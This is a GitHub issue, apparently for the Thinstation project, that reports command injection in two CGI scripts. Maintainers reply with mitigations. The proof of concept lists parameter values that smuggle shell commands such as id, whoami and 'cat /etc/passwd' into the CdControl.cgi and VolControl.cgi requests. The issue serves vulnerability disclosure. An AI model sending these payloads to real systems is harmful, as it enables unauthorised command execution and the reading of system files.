-
-
Notifications
You must be signed in to change notification settings - Fork 188
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CGI Generic Command Execution #427
Comments
You have a recommendation? |
-Avoid calling OS commands directly. |
The webserver has very limited system privileges. Common attacks like rt'ing the passwd file can be mitigated by locking the password, and only allowing a single auto-login. |
Notice to users. Don’t include the www package in your build if your end points might contain sensitive information accessible from an unprivileged user. It’s kind of a No-duh, but now it’s documented. |
The following resources are vulnerable to arbitrary command execution on Thinstation in /cgi-bin/CdControl.cgi and /cgi-bin/VolControl.cgi.
PoC:
/cgi-bin/CdControl.cgi:
action=;id
eject;ifconfig
back;ls -alt
forward;whoami
pause;hostname
/cgi-bin/VolControl.cgi:
OK=;cat /etc/passwd
Please patch asap. Does affect latest version.
For more information read: https://www.owasp.org/index.php/Command_Injection
The text was updated successfully, but these errors were encountered: